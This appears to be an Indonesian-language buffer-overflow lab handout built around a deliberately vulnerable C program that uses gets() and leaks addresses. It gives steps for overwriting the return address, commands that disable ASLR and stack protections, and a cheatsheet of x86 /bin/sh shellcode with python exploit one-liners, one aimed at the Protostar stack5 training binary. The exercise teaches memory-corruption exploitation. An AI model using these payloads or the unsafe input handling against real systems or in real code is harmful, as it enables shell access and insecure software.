Coba

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
	printf("code flow successfully changed\n");
}

int salah()
{
	int p = 0;
	char buffer[100];
	printf("alamat buffer : 0x%08x\n", &buffer);
	printf("alamat win : 0x%08x\n", &win);

	gets(&buffer);

	if(p == 0xdeadbeef) {
		printf("nilai p sudah berubah : %d\n", p);
	} else {
		printf("belum masuk\n");
	}
	return 0;
}

int main(int argc, char **argv)
{
	int hasil;
	hasil = salah();

	return 0;
}

Coba :

  1. amati memori stack dan code
  2. amati assembly
  3. ubah nilai fp
  4. ubah nilai fp menjadi 0xdeadbeef
  5. capai return address
  6. arahkan return ke salah() / ke sembarang alamat
  7. arahkan return ke win()
  8. Jalankan shellcode terserah (/bin/bash/ , /usr/bin/cat /etc/passwd , dll)

Run

Disable aslr / randomize memory

cat /proc/sys/kernel/randomize_va_space 
# perhatikan nilainya, supanya mudah klo mo dikembalikan
echo "0" > /proc/sys/kernel/randomize_va_space

run 32bit

(kode diatas untuk 64bit)

gcc -no-pie -fno-pic -fno-stack-protector -fno-builtin -mpreferred-stack-boundary=2 -m32 -z execstack shellcode.c -o shellcode

run 64bit

gcc -no-pie -fno-pic -fno-stack-protector -fno-builtin -z execstack shellcode.c -o shellcode

Beberapa Cheatsheet

*tdk ada hub dengan yg diatas, namun berikut merupakan referensi

shellcode /bin/sh linux/x86 : 

'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

(python -c "import struct; print 'a'*76 + struct.pack('I', 0xbffff7c0) + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | <file_elf>

(python -c "import struct; print 'a'*76 + struct.pack('I', 0xbffff7c0+30) + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | <file_elf>

(python -c "import struct; print 'a'*76 + struct.pack('I', 0xbffff7c0+30) + '\x90'*100 + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'"; cat) | <file_elf>

(python -c "import struct; print 'a'*76 + struct.pack('I', 0xbffff7b0+8) + '\x90' + '\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'";cat) | /opt/protostar/bin/stack5